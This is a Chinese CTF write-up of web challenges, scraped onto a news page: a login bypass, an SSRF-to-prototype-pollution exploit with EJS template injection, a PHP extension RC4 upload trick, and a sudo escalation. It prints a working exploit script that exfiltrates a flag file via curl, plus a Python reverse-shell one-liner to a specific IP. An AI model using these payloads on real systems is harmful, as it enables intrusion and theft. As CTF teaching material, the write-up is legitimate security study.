当前位置: 首页 > news >正文

网站基础设施建设百度网盘搜索引擎盘多多

news 2025/8/7 0:18:10
网站基础设施建设,百度网盘搜索引擎盘多多,zblog和wordpress哪个好,贵阳网站开发哪家好Node Magical Login 简单的js代码审计。 Flag分成了两部分。 第一部分: 这里就简单的判断了一下user是否等于admin,直接绕过。 第二部分: checkcode ! “aGr5AtSp55dRacer”,让其为真,利用数组绕过。 Flag为&#x…

Node Magical Login

简单的js代码审计。

Flag分成了两部分。

第一部分:

image-20230212211609948

这里就简单的判断了一下user是否等于admin,直接绕过。

image-20230212211635351

第二部分:

image-20230212211645097

checkcode !== “aGr5AtSp55dRacer”,让其为真,利用数组绕过。

image-20230212211657153

Flag为:DASCTF{235657355 32540557696203746863296}

real_ez_node

找到类似的题目。

几道nodejs题目的分析_GAPPPPP的博客-CSDN博客_nodejs ssrf

里边Node Game这一道也是ssrf。

修改一下里边的代码,利用ssrf打原型链污染,然后ejs模板注入。

Exp:

import requests
import urllib.parsedef encode(a):tmp = u""for i in a:tmp += chr(0x0100+ord(i))return tmppayload = ''' HTTP/1.1POST /copy HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.76
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 170{"constructor.prototype.outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('curl http://vps:port -F xx=@/flag.txt');var __tmp2"}
GET / HTTP/1.1
test:'''.replace("\n","\r\n")
payload = encode(payload)
re = requests.get('http://3000.endpoint-9a3d98e7aaf647ae8c64b7007bfc464b.m.ins.cloud.dasctf.com:81/curl?q=' + urllib.parse.quote(payload))
print(re.text)

image-20230212211747125

Flag为:DASCTF{10034776926713905225407173576398}

扭转乾坤

大写一个F即可

image-20230212211811179

DASCTF{407a13a21a6b85b1236b003479468c82}

unusual php

phpinfo发现test的拓展

image-20230212211827292

读php.ini

image-20230212211836461

读取so文件

http://url/?a=read&file=php://filter/convert.base64-encode/resource=/usr/local/lib/php/extensions/no-debug-non-zts-20190902/zend_test.so

反编译看一下存在对文件进行rc4解密操作

image-20230212211902335

那就对一句话rc4加密

image-20230212211912739

base64解码后保存为exp.php,上传发现需要提权

python -c “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("81.69.247.186",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20230212211938045

尝试使用sudo发现tty问题,使用python加载一个pty

python3 -c 'import pty;pty.spawn("/bin/sh")'

image-20230212211957870

sudo进行cat,发现需要密码,在etc目录发现sudoers.bak备份文件,发现www用户chmod不需要密码

image-20230212212017741

直接上权限,读flag

flag为:DASCTF{20663467266566204775890084453113}

http://www.jinmujx.cn/news/113675.html

相关文章:

  • 网站设计要如何做支付功能百度首页精简版
  • 做家教什么网站网页制作与网站建设实战教程
  • 做企业网站的合同百度平台商家app下载
  • 有哪些可以做威客的网站有哪些李勇seo的博客
  • 一键免费搭建手机网站网站快速排名推广软件
  • 网站开发就业趋势广州网站推广联盟
  • 轻淘客一键做网站谷歌seo需要做什么的
  • 潍坊专业网站建设价格低湖南做网站的公司
  • 公司企业邮箱注册申请福州seo网站排名
  • 福州如何做百度的网站推广快排seo软件
  • 做身份证网站百度广告平台电话
  • 安阳网站制作价格湖南seo优化哪家好
  • 网站建设超链接字体变色代码关键词全网搜索工具
  • 博州住房和城乡建设局网站市场营销策划方案案例
  • 个人博客网站模板素材南宁百度关键词排名公司
  • 张家港建设局网站东莞优化排名公司
  • 高端企业网站建设流程电商引流推广方法
  • c2c网站内容及功能开始google chrome浏览器
  • 湛江网站seo推广海阳seo排名优化培训
  • 网站链接的常见形式品牌推广软文200字
  • 做网站 工资高吗品牌营销策略有哪些
  • 梅州市网站制作太原百度seo排名
  • 选择网站建设公司应该注意什么网站制作公司排名
  • 做网站找哪里百家号关键词排名优化
  • 松江php网站开发培训青岛网站建设公司
  • 政网站首页怎么做试公众号seo排名软件
  • 那个网站可以找人做兼职网站技术解决方案
  • seo关键词外包公司爱站网站长seo综合查询工具
  • av手机在线精品自动优化app
  • 深圳网站建设及优化seo排名优化的网站